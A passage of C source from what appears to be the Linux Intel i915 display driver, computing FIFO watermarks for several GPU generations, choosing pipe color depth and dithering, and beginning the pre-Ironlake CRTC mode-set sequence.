		cursor_sr = i965_cursor_wm_info.fifo_size -
			(entries + i965_cursor_wm_info.guard_size);
		if (cursor_sr > i965_cursor_wm_info.max_wm)
			cursor_sr = i965_cursor_wm_info.max_wm;
		DRM_DEBUG_KMS("self-refresh watermark: display plane %d "
			      "cursor %d\n", srwm, cursor_sr);

		if (IS_CRESTLINE(dev))
			I915_WRITE(FW_BLC_SELF, FW_BLC_SELF_EN);
	} else {
		/* Turn off self refresh if both pipes are enabled */
		if (IS_CRESTLINE(dev))
			I915_WRITE(FW_BLC_SELF, I915_READ(FW_BLC_SELF)
				   & ~FW_BLC_SELF_EN);
	}

	DRM_DEBUG_KMS("Setting FIFO watermarks - A: 8, B: 8, C: 8, SR %d\n",
		      srwm);

	/* 965 has limitations... */
	I915_WRITE(DSPFW1, (srwm << DSPFW_SR_SHIFT) |
		   (8 << 16) | (8 << 8) | (8 << 0));
	I915_WRITE(DSPFW2, (8 << 8) | (8 << 0));
	/* update cursor SR watermark */
	I915_WRITE(DSPFW3, (cursor_sr << DSPFW_CURSOR_SR_SHIFT));
}
/*
 * i9xx_update_wm - program pre-965 (i915/i945/i8xx class) watermarks.
 *
 * Computes per-plane WM0 values, then - with exactly one plane active
 * and FW_BLC support - the self-refresh watermark.  Self-refresh is
 * disabled before the watermark registers are touched and re-enabled
 * (when possible) only afterwards.
 */
static void i9xx_update_wm(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	const struct intel_watermark_params *wm_info;
	uint32_t fwater_lo;
	uint32_t fwater_hi;
	int cwm, srwm = 1;
	int fifo_size;
	int planea_wm, planeb_wm;
	struct drm_crtc *crtc, *enabled = NULL;

	if (IS_I945GM(dev))
		wm_info = &i945_wm_info;
	else if (!IS_GEN2(dev))
		wm_info = &i915_wm_info;
	else
		wm_info = &i855_wm_info;

	fifo_size = dev_priv->display.get_fifo_size(dev, 0);
	crtc = intel_get_crtc_for_plane(dev, 0);
	if (crtc->enabled && crtc->fb) {
		planea_wm = intel_calculate_wm(crtc->mode.clock,
					       wm_info, fifo_size,
					       crtc->fb->bits_per_pixel / 8,
					       latency_ns);
		enabled = crtc;
	} else
		planea_wm = fifo_size - wm_info->guard_size;

	fifo_size = dev_priv->display.get_fifo_size(dev, 1);
	crtc = intel_get_crtc_for_plane(dev, 1);
	if (crtc->enabled && crtc->fb) {
		planeb_wm = intel_calculate_wm(crtc->mode.clock,
					       wm_info, fifo_size,
					       crtc->fb->bits_per_pixel / 8,
					       latency_ns);
		/* 'enabled' ends up NULL when both planes are active:
		 * self-refresh requires a single-plane configuration. */
		if (enabled == NULL)
			enabled = crtc;
		else
			enabled = NULL;
	} else
		planeb_wm = fifo_size - wm_info->guard_size;

	DRM_DEBUG_KMS("FIFO watermarks - A: %d, B: %d\n", planea_wm, planeb_wm);

	/*
	 * Overlay gets an aggressive default since video jitter is bad.
	 */
	cwm = 2;

	/* Play safe and disable self-refresh before adjusting watermarks. */
	if (IS_I945G(dev) || IS_I945GM(dev))
		I915_WRITE(FW_BLC_SELF, FW_BLC_SELF_EN_MASK | 0);
	else if (IS_I915GM(dev))
		I915_WRITE(INSTPM, I915_READ(INSTPM) & ~INSTPM_SELF_EN);

	/* Calc sr entries for one plane configs */
	if (HAS_FW_BLC(dev) && enabled) {
		/* self-refresh has much higher latency */
		static const int sr_latency_ns = 6000;
		int clock = enabled->mode.clock;
		int htotal = enabled->mode.htotal;
		int hdisplay = enabled->mode.hdisplay;
		int pixel_size = enabled->fb->bits_per_pixel / 8;
		unsigned long line_time_us;
		int entries;

		line_time_us = (htotal * 1000) / clock;

		/* Use ns/us then divide to preserve precision */
		entries = (((sr_latency_ns / line_time_us) + 1000) / 1000) *
			pixel_size * hdisplay;
		entries = DIV_ROUND_UP(entries, wm_info->cacheline_size);
		DRM_DEBUG_KMS("self-refresh entries: %d\n", entries);
		srwm = wm_info->fifo_size - entries;
		if (srwm < 0)
			srwm = 1;

		if (IS_I945G(dev) || IS_I945GM(dev))
			I915_WRITE(FW_BLC_SELF,
				   FW_BLC_SELF_FIFO_MASK | (srwm & 0xff));
		else if (IS_I915GM(dev))
			I915_WRITE(FW_BLC_SELF, srwm & 0x3f);
	}

	DRM_DEBUG_KMS("Setting FIFO watermarks - A: %d, B: %d, C: %d, SR %d\n",
		      planea_wm, planeb_wm, cwm, srwm);

	fwater_lo = ((planeb_wm & 0x3f) << 16) | (planea_wm & 0x3f);
	fwater_hi = (cwm & 0x1f);

	/* Set request length to 8 cachelines per fetch */
	fwater_lo = fwater_lo | (1 << 24) | (1 << 8);
	fwater_hi = fwater_hi | (1 << 8);

	I915_WRITE(FW_BLC, fwater_lo);
	I915_WRITE(FW_BLC2, fwater_hi);

	if (HAS_FW_BLC(dev)) {
		if (enabled) {
			if (IS_I945G(dev) || IS_I945GM(dev))
				I915_WRITE(FW_BLC_SELF,
					   FW_BLC_SELF_EN_MASK | FW_BLC_SELF_EN);
			else if (IS_I915GM(dev))
				I915_WRITE(INSTPM, I915_READ(INSTPM) | INSTPM_SELF_EN);
			DRM_DEBUG_KMS("memory self refresh enabled\n");
		} else
			DRM_DEBUG_KMS("memory self refresh disabled\n");
	}
}
/*
 * i830_update_wm - program the i830 plane A watermark.
 *
 * Only acts when exactly one CRTC is enabled; writes the computed
 * value (plus a fixed burst-length field) into FW_BLC.
 */
static void i830_update_wm(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct drm_crtc *crtc;
	uint32_t fwater_lo;
	int planea_wm;

	crtc = single_enabled_crtc(dev);
	if (crtc == NULL)
		return;

	planea_wm = intel_calculate_wm(crtc->mode.clock, &i830_wm_info,
				       dev_priv->display.get_fifo_size(dev, 0),
				       crtc->fb->bits_per_pixel / 8,
				       latency_ns);
	fwater_lo = I915_READ(FW_BLC) & ~0xfff;
	fwater_lo |= (3<<8) | planea_wm;

	DRM_DEBUG_KMS("Setting FIFO watermarks - A: %d\n", planea_wm);

	I915_WRITE(FW_BLC, fwater_lo);
}
/* Ironlake LP0 (WM0) latencies, in nanoseconds (passed as the
 * *_latency_ns arguments of g4x_compute_wm0()). */
#define ILK_LP0_PLANE_LATENCY 700
#define ILK_LP0_CURSOR_LATENCY 1300
/*
* Check the wm result.
*
* If any calculated watermark values is larger than the maximum value that
* can be programmed into the associated watermark register, that watermark
* must be disabled.
*/
/*
 * ironlake_check_srwm - validate computed WM[1-3] values.
 *
 * Returns false (the level must stay disabled) when any value exceeds
 * its register field or when all three are zero; true when they are
 * programmable.  An oversized FBC watermark additionally sets
 * DISP_FBC_WM_DIS in DISP_ARB_CTL.
 */
static bool ironlake_check_srwm(struct drm_device *dev, int level,
				int fbc_wm, int display_wm, int cursor_wm,
				const struct intel_watermark_params *display,
				const struct intel_watermark_params *cursor)
{
	struct drm_i915_private *dev_priv = dev->dev_private;

	DRM_DEBUG_KMS("watermark %d: display plane %d, fbc lines %d,"
		      " cursor %d\n", level, display_wm, fbc_wm, cursor_wm);

	if (fbc_wm > SNB_FBC_MAX_SRWM) {
		DRM_DEBUG_KMS("fbc watermark(%d) is too large(%d), disabling wm%d+\n",
			      fbc_wm, SNB_FBC_MAX_SRWM, level);

		/* fbc has its own way to disable FBC WM */
		I915_WRITE(DISP_ARB_CTL,
			   I915_READ(DISP_ARB_CTL) | DISP_FBC_WM_DIS);
		return false;
	}

	if (display_wm > display->max_wm) {
		/* Report the limit actually checked - this helper is
		 * shared between the Ironlake and SandyBridge parameter
		 * sets, so printing the SNB constant would mislead. */
		DRM_DEBUG_KMS("display watermark(%d) is too large(%ld), disabling wm%d+\n",
			      display_wm, display->max_wm, level);
		return false;
	}

	if (cursor_wm > cursor->max_wm) {
		DRM_DEBUG_KMS("cursor watermark(%d) is too large(%ld), disabling wm%d+\n",
			      cursor_wm, cursor->max_wm, level);
		return false;
	}

	if (!(fbc_wm || display_wm || cursor_wm)) {
		DRM_DEBUG_KMS("latency %d is 0, disabling wm%d+\n", level, level);
		return false;
	}

	return true;
}
/*
* Compute watermark values of WM[1-3],
*/
/*
 * ironlake_compute_srwm - compute WM[1-3] display, FBC and cursor
 * watermarks for the given plane, then validate them via
 * ironlake_check_srwm().
 *
 * Returns false when latency_ns is zero (all outputs cleared) or when
 * validation fails.
 */
static bool ironlake_compute_srwm(struct drm_device *dev, int level, int plane,
				  int latency_ns,
				  const struct intel_watermark_params *display,
				  const struct intel_watermark_params *cursor,
				  int *fbc_wm, int *display_wm, int *cursor_wm)
{
	struct drm_crtc *crtc;
	unsigned long line_time_us;
	int hdisplay, htotal, pixel_size, clock;
	int line_count, line_size;
	int small, large;
	int entries;

	if (!latency_ns) {
		*fbc_wm = *display_wm = *cursor_wm = 0;
		return false;
	}

	crtc = intel_get_crtc_for_plane(dev, plane);
	hdisplay = crtc->mode.hdisplay;
	htotal = crtc->mode.htotal;
	clock = crtc->mode.clock;
	pixel_size = crtc->fb->bits_per_pixel / 8;

	line_time_us = (htotal * 1000) / clock;
	line_count = (latency_ns / line_time_us + 1000) / 1000;
	line_size = hdisplay * pixel_size;

	/* Use the minimum of the small and large buffer method for primary */
	small = ((clock * pixel_size / 1000) * latency_ns) / 1000;
	large = line_count * line_size;

	entries = DIV_ROUND_UP(min(small, large), display->cacheline_size);
	*display_wm = entries + display->guard_size;

	/*
	 * Spec says:
	 * FBC WM = ((Final Primary WM * 64) / number of bytes per line) + 2
	 */
	*fbc_wm = DIV_ROUND_UP(*display_wm * 64, line_size) + 2;

	/* calculate the self-refresh watermark for display cursor */
	entries = line_count * pixel_size * 64;
	entries = DIV_ROUND_UP(entries, cursor->cacheline_size);
	*cursor_wm = entries + cursor->guard_size;

	return ironlake_check_srwm(dev, level,
				   *fbc_wm, *display_wm, *cursor_wm,
				   display, cursor);
}
/*
 * ironlake_update_wm - program Ironlake WM0 for both pipes and, with a
 * single plane enabled, the WM1/WM2 self-refresh levels.
 *
 * WM1-WM3 are cleared first so the levels are only ever enabled in
 * ascending order with valid values.  WM3 is left disabled (no
 * latency data for ILK).
 */
static void ironlake_update_wm(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	int fbc_wm, plane_wm, cursor_wm;
	unsigned int enabled;

	enabled = 0;
	if (g4x_compute_wm0(dev, 0,
			    &ironlake_display_wm_info,
			    ILK_LP0_PLANE_LATENCY,
			    &ironlake_cursor_wm_info,
			    ILK_LP0_CURSOR_LATENCY,
			    &plane_wm, &cursor_wm)) {
		I915_WRITE(WM0_PIPEA_ILK,
			   (plane_wm << WM0_PIPE_PLANE_SHIFT) | cursor_wm);
		DRM_DEBUG_KMS("FIFO watermarks For pipe A -"
			      " plane %d, " "cursor: %d\n",
			      plane_wm, cursor_wm);
		enabled |= 1;
	}

	if (g4x_compute_wm0(dev, 1,
			    &ironlake_display_wm_info,
			    ILK_LP0_PLANE_LATENCY,
			    &ironlake_cursor_wm_info,
			    ILK_LP0_CURSOR_LATENCY,
			    &plane_wm, &cursor_wm)) {
		I915_WRITE(WM0_PIPEB_ILK,
			   (plane_wm << WM0_PIPE_PLANE_SHIFT) | cursor_wm);
		DRM_DEBUG_KMS("FIFO watermarks For pipe B -"
			      " plane %d, cursor: %d\n",
			      plane_wm, cursor_wm);
		enabled |= 2;
	}

	/*
	 * Calculate and update the self-refresh watermark only when one
	 * display plane is used.
	 */
	I915_WRITE(WM3_LP_ILK, 0);
	I915_WRITE(WM2_LP_ILK, 0);
	I915_WRITE(WM1_LP_ILK, 0);

	if (!single_plane_enabled(enabled))
		return;
	enabled = ffs(enabled) - 1;

	/* WM1 */
	if (!ironlake_compute_srwm(dev, 1, enabled,
				   ILK_READ_WM1_LATENCY() * 500,
				   &ironlake_display_srwm_info,
				   &ironlake_cursor_srwm_info,
				   &fbc_wm, &plane_wm, &cursor_wm))
		return;

	I915_WRITE(WM1_LP_ILK,
		   WM1_LP_SR_EN |
		   (ILK_READ_WM1_LATENCY() << WM1_LP_LATENCY_SHIFT) |
		   (fbc_wm << WM1_LP_FBC_SHIFT) |
		   (plane_wm << WM1_LP_SR_SHIFT) |
		   cursor_wm);

	/* WM2 */
	if (!ironlake_compute_srwm(dev, 2, enabled,
				   ILK_READ_WM2_LATENCY() * 500,
				   &ironlake_display_srwm_info,
				   &ironlake_cursor_srwm_info,
				   &fbc_wm, &plane_wm, &cursor_wm))
		return;

	I915_WRITE(WM2_LP_ILK,
		   WM2_LP_EN |
		   (ILK_READ_WM2_LATENCY() << WM1_LP_LATENCY_SHIFT) |
		   (fbc_wm << WM1_LP_FBC_SHIFT) |
		   (plane_wm << WM1_LP_SR_SHIFT) |
		   cursor_wm);

	/*
	 * WM3 is unsupported on ILK, probably because we don't have latency
	 * data for that power state
	 */
}
/*
 * sandybridge_update_wm - program SandyBridge WM0 for both pipes and,
 * with a single plane enabled, the WM1/WM2/WM3 self-refresh levels.
 */
static void sandybridge_update_wm(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;
	int latency = SNB_READ_WM0_LATENCY() * 100;	/* In unit 0.1us */
	int fbc_wm, plane_wm, cursor_wm;
	unsigned int enabled;

	enabled = 0;
	if (g4x_compute_wm0(dev, 0,
			    &sandybridge_display_wm_info, latency,
			    &sandybridge_cursor_wm_info, latency,
			    &plane_wm, &cursor_wm)) {
		I915_WRITE(WM0_PIPEA_ILK,
			   (plane_wm << WM0_PIPE_PLANE_SHIFT) | cursor_wm);
		DRM_DEBUG_KMS("FIFO watermarks For pipe A -"
			      " plane %d, " "cursor: %d\n",
			      plane_wm, cursor_wm);
		enabled |= 1;
	}

	if (g4x_compute_wm0(dev, 1,
			    &sandybridge_display_wm_info, latency,
			    &sandybridge_cursor_wm_info, latency,
			    &plane_wm, &cursor_wm)) {
		I915_WRITE(WM0_PIPEB_ILK,
			   (plane_wm << WM0_PIPE_PLANE_SHIFT) | cursor_wm);
		DRM_DEBUG_KMS("FIFO watermarks For pipe B -"
			      " plane %d, cursor: %d\n",
			      plane_wm, cursor_wm);
		enabled |= 2;
	}

	/*
	 * Calculate and update the self-refresh watermark only when one
	 * display plane is used.
	 *
	 * SNB support 3 levels of watermark.
	 *
	 * WM1/WM2/WM3 watermarks have to be enabled in the ascending order,
	 * and disabled in the descending order
	 *
	 */
	I915_WRITE(WM3_LP_ILK, 0);
	I915_WRITE(WM2_LP_ILK, 0);
	I915_WRITE(WM1_LP_ILK, 0);

	if (!single_plane_enabled(enabled))
		return;
	enabled = ffs(enabled) - 1;

	/* WM1 */
	if (!ironlake_compute_srwm(dev, 1, enabled,
				   SNB_READ_WM1_LATENCY() * 500,
				   &sandybridge_display_srwm_info,
				   &sandybridge_cursor_srwm_info,
				   &fbc_wm, &plane_wm, &cursor_wm))
		return;

	I915_WRITE(WM1_LP_ILK,
		   WM1_LP_SR_EN |
		   (SNB_READ_WM1_LATENCY() << WM1_LP_LATENCY_SHIFT) |
		   (fbc_wm << WM1_LP_FBC_SHIFT) |
		   (plane_wm << WM1_LP_SR_SHIFT) |
		   cursor_wm);

	/* WM2 */
	if (!ironlake_compute_srwm(dev, 2, enabled,
				   SNB_READ_WM2_LATENCY() * 500,
				   &sandybridge_display_srwm_info,
				   &sandybridge_cursor_srwm_info,
				   &fbc_wm, &plane_wm, &cursor_wm))
		return;

	I915_WRITE(WM2_LP_ILK,
		   WM2_LP_EN |
		   (SNB_READ_WM2_LATENCY() << WM1_LP_LATENCY_SHIFT) |
		   (fbc_wm << WM1_LP_FBC_SHIFT) |
		   (plane_wm << WM1_LP_SR_SHIFT) |
		   cursor_wm);

	/* WM3 */
	if (!ironlake_compute_srwm(dev, 3, enabled,
				   SNB_READ_WM3_LATENCY() * 500,
				   &sandybridge_display_srwm_info,
				   &sandybridge_cursor_srwm_info,
				   &fbc_wm, &plane_wm, &cursor_wm))
		return;

	I915_WRITE(WM3_LP_ILK,
		   WM3_LP_EN |
		   (SNB_READ_WM3_LATENCY() << WM1_LP_LATENCY_SHIFT) |
		   (fbc_wm << WM1_LP_FBC_SHIFT) |
		   (plane_wm << WM1_LP_SR_SHIFT) |
		   cursor_wm);
}
/**
* intel_update_watermarks - update FIFO watermark values based on current modes
*
* Calculate watermark values for the various WM regs based on current mode
* and plane configuration.
*
* There are several cases to deal with here:
* - normal (i.e. non-self-refresh)
* - self-refresh (SR) mode
* - lines are large relative to FIFO size (buffer can hold up to 2)
* - lines are small relative to FIFO size (buffer can hold more than 2
* lines), so need to account for TLB latency
*
* The normal calculation is:
* watermark = dotclock * bytes per pixel * latency
* where latency is platform & configuration dependent (we assume pessimal
* values here).
*
* The SR calculation is:
* watermark = (trunc(latency/line time)+1) * surface width *
* bytes per pixel
* where
* line time = htotal / dotclock
* surface width = hdisplay for normal plane and 64 for cursor
* and latency is assumed to be high, as above.
*
* The final value programmed to the register should always be rounded up,
* and include an extra 2 entries to account for clock crossings.
*
* We don't use the sprite, so we can ignore that. And on Crestline we have
* to set the non-SR watermarks to 8.
*/
/* Dispatch to the platform's watermark update hook, if any. */
static void intel_update_watermarks(struct drm_device *dev)
{
	struct drm_i915_private *dev_priv = dev->dev_private;

	if (!dev_priv->display.update_wm)
		return;

	dev_priv->display.update_wm(dev);
}
static inline bool intel_panel_use_ssc(struct drm_i915_private *dev_priv)
{
return dev_priv->lvds_use_ssc && i915_panel_use_ssc
&& !(dev_priv->quirks & QUIRK_LVDS_SSC_DISABLE);
}
/**
* intel_choose_pipe_bpp_dither - figure out what color depth the pipe should send
* @crtc: CRTC structure
*
* A pipe may be connected to one or more outputs. Based on the depth of the
* attached framebuffer, choose a good color depth to use on the pipe.
*
* If possible, match the pipe depth to the fb depth. In some cases, this
* isn't ideal, because the connected output supports a lesser or restricted
* set of depths. Resolve that here:
* LVDS typically supports only 6bpc, so clamp down in that case
* HDMI supports only 8bpc or 12bpc, so clamp to 8bpc with dither for 10bpc
* Displays may support a restricted set as well, check EDID and clamp as
* appropriate.
*
* RETURNS:
* Dithering requirement (i.e. false if display bpc and pipe bpc match,
* true if they don't match).
*/
static bool intel_choose_pipe_bpp_dither(struct drm_crtc *crtc,
					 unsigned int *pipe_bpp)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct drm_encoder *encoder;
	struct drm_connector *connector;
	unsigned int display_bpc = UINT_MAX, bpc;

	/* Walk the encoders & connectors on this crtc, get min bpc */
	list_for_each_entry(encoder, &dev->mode_config.encoder_list, head) {
		struct intel_encoder *intel_encoder = to_intel_encoder(encoder);

		if (encoder->crtc != crtc)
			continue;

		if (intel_encoder->type == INTEL_OUTPUT_LVDS) {
			unsigned int lvds_bpc;

			/* LVDS bpc is inferred from the A3 power state bits. */
			if ((I915_READ(PCH_LVDS) & LVDS_A3_POWER_MASK) ==
			    LVDS_A3_POWER_UP)
				lvds_bpc = 8;
			else
				lvds_bpc = 6;

			if (lvds_bpc < display_bpc) {
				DRM_DEBUG_DRIVER("clamping display bpc (was %d) to LVDS (%d)\n", display_bpc, lvds_bpc);
				display_bpc = lvds_bpc;
			}
			continue;
		}

		if (intel_encoder->type == INTEL_OUTPUT_EDP) {
			/* Use VBT settings if we have an eDP panel */
			unsigned int edp_bpc = dev_priv->edp.bpp / 3;

			if (edp_bpc < display_bpc) {
				DRM_DEBUG_DRIVER("clamping display bpc (was %d) to eDP (%d)\n", display_bpc, edp_bpc);
				display_bpc = edp_bpc;
			}
			continue;
		}

		/* Not one of the known troublemakers, check the EDID */
		list_for_each_entry(connector, &dev->mode_config.connector_list,
				    head) {
			if (connector->encoder != encoder)
				continue;

			/* Don't use an invalid EDID bpc value */
			if (connector->display_info.bpc &&
			    connector->display_info.bpc < display_bpc) {
				DRM_DEBUG_DRIVER("clamping display bpc (was %d) to EDID reported max of %d\n", display_bpc, connector->display_info.bpc);
				display_bpc = connector->display_info.bpc;
			}
		}

		/*
		 * HDMI is either 12 or 8, so if the display lets 10bpc sneak
		 * through, clamp it down.  (Note: >12bpc will be caught below.)
		 *
		 * NOTE(review): for 9-11bpc the code rounds UP to 12 rather
		 * than clamping down; confirm this matches HDMI sink
		 * expectations.
		 */
		if (intel_encoder->type == INTEL_OUTPUT_HDMI) {
			if (display_bpc > 8 && display_bpc < 12) {
				DRM_DEBUG_DRIVER("forcing bpc to 12 for HDMI\n");
				display_bpc = 12;
			} else {
				DRM_DEBUG_DRIVER("forcing bpc to 8 for HDMI\n");
				display_bpc = 8;
			}
		}
	}

	/*
	 * We could just drive the pipe at the highest bpc all the time and
	 * enable dithering as needed, but that costs bandwidth.  So choose
	 * the minimum value that expresses the full color range of the fb but
	 * also stays within the max display bpc discovered above.
	 */
	switch (crtc->fb->depth) {
	case 8:
		bpc = 8; /* since we go through a colormap */
		break;
	case 15:
	case 16:
		bpc = 6; /* min is 18bpp */
		break;
	case 24:
		bpc = 8;
		break;
	case 30:
		bpc = 10;
		break;
	case 48:
		bpc = 12;
		break;
	default:
		DRM_DEBUG("unsupported depth, assuming 24 bits\n");
		bpc = min((unsigned int)8, display_bpc);
		break;
	}

	display_bpc = min(display_bpc, bpc);

	/* NOTE(review): the pipe is set to display_bpc below, but this
	 * message prints bpc first - the argument order looks swapped
	 * relative to the wording; verify. */
	DRM_DEBUG_DRIVER("setting pipe bpc to %d (max display bpc %d)\n",
			 bpc, display_bpc);

	*pipe_bpp = display_bpc * 3;

	/* Dithering is needed iff the fb depth and the pipe depth differ. */
	return display_bpc != bpc;
}
/*
 * i9xx_crtc_mode_set - full mode set for pre-Ironlake pipes.
 *
 * Scans the encoders attached to the crtc, chooses a reference clock
 * and PLL divisors, builds the DPLL/FP/pipeconf/display plane register
 * values, programs the pipe timing registers and finally enables pipe
 * and plane.  The register write ordering below (DPLL without VCO,
 * LVDS port, DPLL with VCO, delays) follows the hardware's required
 * enable sequence - do not reorder.
 */
static int i9xx_crtc_mode_set(struct drm_crtc *crtc,
			      struct drm_display_mode *mode,
			      struct drm_display_mode *adjusted_mode,
			      int x, int y,
			      struct drm_framebuffer *old_fb)
{
	struct drm_device *dev = crtc->dev;
	struct drm_i915_private *dev_priv = dev->dev_private;
	struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
	int pipe = intel_crtc->pipe;
	int plane = intel_crtc->plane;
	int refclk, num_connectors = 0;
	intel_clock_t clock, reduced_clock;
	u32 dpll, fp = 0, fp2 = 0, dspcntr, pipeconf;
	bool ok, has_reduced_clock = false, is_sdvo = false, is_dvo = false;
	bool is_crt = false, is_lvds = false, is_tv = false, is_dp = false;
	struct drm_mode_config *mode_config = &dev->mode_config;
	struct intel_encoder *encoder;
	const intel_limit_t *limit;
	int ret;
	u32 temp;
	u32 lvds_sync = 0;

	/* Classify the outputs attached to this crtc. */
	list_for_each_entry(encoder, &mode_config->encoder_list, base.head) {
		if (encoder->base.crtc != crtc)
			continue;

		switch (encoder->type) {
		case INTEL_OUTPUT_LVDS:
			is_lvds = true;
			break;
		case INTEL_OUTPUT_SDVO:
		case INTEL_OUTPUT_HDMI:
			is_sdvo = true;
			if (encoder->needs_tv_clock)
				is_tv = true;
			break;
		case INTEL_OUTPUT_DVO:
			is_dvo = true;
			break;
		case INTEL_OUTPUT_TVOUT:
			is_tv = true;
			break;
		case INTEL_OUTPUT_ANALOG:
			is_crt = true;
			break;
		case INTEL_OUTPUT_DISPLAYPORT:
			is_dp = true;
			break;
		}

		num_connectors++;
	}

	/* Pick the reference clock: SSC for a lone LVDS, else a fixed
	 * per-generation frequency. */
	if (is_lvds && intel_panel_use_ssc(dev_priv) && num_connectors < 2) {
		refclk = dev_priv->lvds_ssc_freq * 1000;
		DRM_DEBUG_KMS("using SSC reference clock of %d MHz\n",
			      refclk / 1000);
	} else if (!IS_GEN2(dev)) {
		refclk = 96000;
	} else {
		refclk = 48000;
	}

	/*
	 * Returns a set of divisors for the desired target clock with the given
	 * refclk, or FALSE.  The returned values represent the clock equation:
	 * reflck * (5 * (m1 + 2) + (m2 + 2)) / (n + 2) / p1 / p2.
	 */
	limit = intel_limit(crtc, refclk);
	ok = limit->find_pll(limit, crtc, adjusted_mode->clock, refclk, &clock);
	if (!ok) {
		DRM_ERROR("Couldn't find PLL settings for mode!\n");
		return -EINVAL;
	}

	/* Ensure that the cursor is valid for the new mode before changing... */
	intel_crtc_update_cursor(crtc, true);

	if (is_lvds && dev_priv->lvds_downclock_avail) {
		has_reduced_clock = limit->find_pll(limit, crtc,
						    dev_priv->lvds_downclock,
						    refclk,
						    &reduced_clock);
		if (has_reduced_clock && (clock.p != reduced_clock.p)) {
			/*
			 * If the different P is found, it means that we can't
			 * switch the display clock by using the FP0/FP1.
			 * In such case we will disable the LVDS downclock
			 * feature.
			 */
			DRM_DEBUG_KMS("Different P is found for "
				      "LVDS clock/downclock\n");
			has_reduced_clock = 0;
		}
	}
	/* SDVO TV has fixed PLL values depend on its clock range,
	   this mirrors vbios setting. */
	if (is_sdvo && is_tv) {
		if (adjusted_mode->clock >= 100000
		    && adjusted_mode->clock < 140500) {
			clock.p1 = 2;
			clock.p2 = 10;
			clock.n = 3;
			clock.m1 = 16;
			clock.m2 = 8;
		} else if (adjusted_mode->clock >= 140500
			   && adjusted_mode->clock <= 200000) {
			clock.p1 = 1;
			clock.p2 = 10;
			clock.n = 6;
			clock.m1 = 12;
			clock.m2 = 8;
		}
	}

	/* Pack the divisors into FP0/FP1 format (Pineview encodes n
	 * differently). */
	if (IS_PINEVIEW(dev)) {
		fp = (1 << clock.n) << 16 | clock.m1 << 8 | clock.m2;
		if (has_reduced_clock)
			fp2 = (1 << reduced_clock.n) << 16 |
				reduced_clock.m1 << 8 | reduced_clock.m2;
	} else {
		fp = clock.n << 16 | clock.m1 << 8 | clock.m2;
		if (has_reduced_clock)
			fp2 = reduced_clock.n << 16 | reduced_clock.m1 << 8 |
				reduced_clock.m2;
	}

	/* Build the DPLL control value. */
	dpll = DPLL_VGA_MODE_DIS;

	if (!IS_GEN2(dev)) {
		if (is_lvds)
			dpll |= DPLLB_MODE_LVDS;
		else
			dpll |= DPLLB_MODE_DAC_SERIAL;
		if (is_sdvo) {
			int pixel_multiplier = intel_mode_get_pixel_multiplier(adjusted_mode);
			if (pixel_multiplier > 1) {
				if (IS_I945G(dev) || IS_I945GM(dev) || IS_G33(dev))
					dpll |= (pixel_multiplier - 1) << SDVO_MULTIPLIER_SHIFT_HIRES;
			}
			dpll |= DPLL_DVO_HIGH_SPEED;
		}
		if (is_dp)
			dpll |= DPLL_DVO_HIGH_SPEED;

		/* compute bitmask from p1 value */
		if (IS_PINEVIEW(dev))
			dpll |= (1 << (clock.p1 - 1)) << DPLL_FPA01_P1_POST_DIV_SHIFT_PINEVIEW;
		else {
			dpll |= (1 << (clock.p1 - 1)) << DPLL_FPA01_P1_POST_DIV_SHIFT;
			if (IS_G4X(dev) && has_reduced_clock)
				dpll |= (1 << (reduced_clock.p1 - 1)) << DPLL_FPA1_P1_POST_DIV_SHIFT;
		}
		switch (clock.p2) {
		case 5:
			dpll |= DPLL_DAC_SERIAL_P2_CLOCK_DIV_5;
			break;
		case 7:
			dpll |= DPLLB_LVDS_P2_CLOCK_DIV_7;
			break;
		case 10:
			dpll |= DPLL_DAC_SERIAL_P2_CLOCK_DIV_10;
			break;
		case 14:
			dpll |= DPLLB_LVDS_P2_CLOCK_DIV_14;
			break;
		}
		if (INTEL_INFO(dev)->gen >= 4)
			dpll |= (6 << PLL_LOAD_PULSE_PHASE_SHIFT);
	} else {
		if (is_lvds) {
			dpll |= (1 << (clock.p1 - 1)) << DPLL_FPA01_P1_POST_DIV_SHIFT;
		} else {
			if (clock.p1 == 2)
				dpll |= PLL_P1_DIVIDE_BY_TWO;
			else
				dpll |= (clock.p1 - 2) << DPLL_FPA01_P1_POST_DIV_SHIFT;
			if (clock.p2 == 4)
				dpll |= PLL_P2_DIVIDE_BY_4;
		}
	}

	if (is_sdvo && is_tv)
		dpll |= PLL_REF_INPUT_TVCLKINBC;
	else if (is_tv)
		/* XXX: just matching BIOS for now */
		/*	dpll |= PLL_REF_INPUT_TVCLKINBC; */
		dpll |= 3;
	else if (is_lvds && intel_panel_use_ssc(dev_priv) && num_connectors < 2)
		dpll |= PLLB_REF_INPUT_SPREADSPECTRUMIN;
	else
		dpll |= PLL_REF_INPUT_DREFCLK;

	/* setup pipeconf */
	pipeconf = I915_READ(PIPECONF(pipe));

	/* Set up the display plane register */
	dspcntr = DISPPLANE_GAMMA_ENABLE;

	/* Ironlake's plane is forced to pipe, bit 24 is to
	   enable color space conversion */
	if (pipe == 0)
		dspcntr &= ~DISPPLANE_SEL_PIPE_MASK;
	else
		dspcntr |= DISPPLANE_SEL_PIPE_B;

	if (pipe == 0 && INTEL_INFO(dev)->gen < 4) {
		/* Enable pixel doubling when the dot clock is > 90% of the (display)
		 * core speed.
		 *
		 * XXX: No double-wide on 915GM pipe B. Is that the only reason for the
		 * pipe == 0 check?
		 */
		if (mode->clock >
		    dev_priv->display.get_display_clock_speed(dev) * 9 / 10)
			pipeconf |= PIPECONF_DOUBLE_WIDE;
		else
			pipeconf &= ~PIPECONF_DOUBLE_WIDE;
	}

	dpll |= DPLL_VCO_ENABLE;

	DRM_DEBUG_KMS("Mode for pipe %c:\n", pipe == 0 ? 'A' : 'B');
	drm_mode_debug_printmodeline(mode);

	/* Program the divisors, then the DPLL with the VCO still off;
	 * the VCO is enabled only after the LVDS port is set up. */
	I915_WRITE(FP0(pipe), fp);
	I915_WRITE(DPLL(pipe), dpll & ~DPLL_VCO_ENABLE);

	POSTING_READ(DPLL(pipe));
	udelay(150);

	/* The LVDS pin pair needs to be on before the DPLLs are enabled.
	 * This is an exception to the general rule that mode_set doesn't turn
	 * things on.
	 */
	if (is_lvds) {
		temp = I915_READ(LVDS);
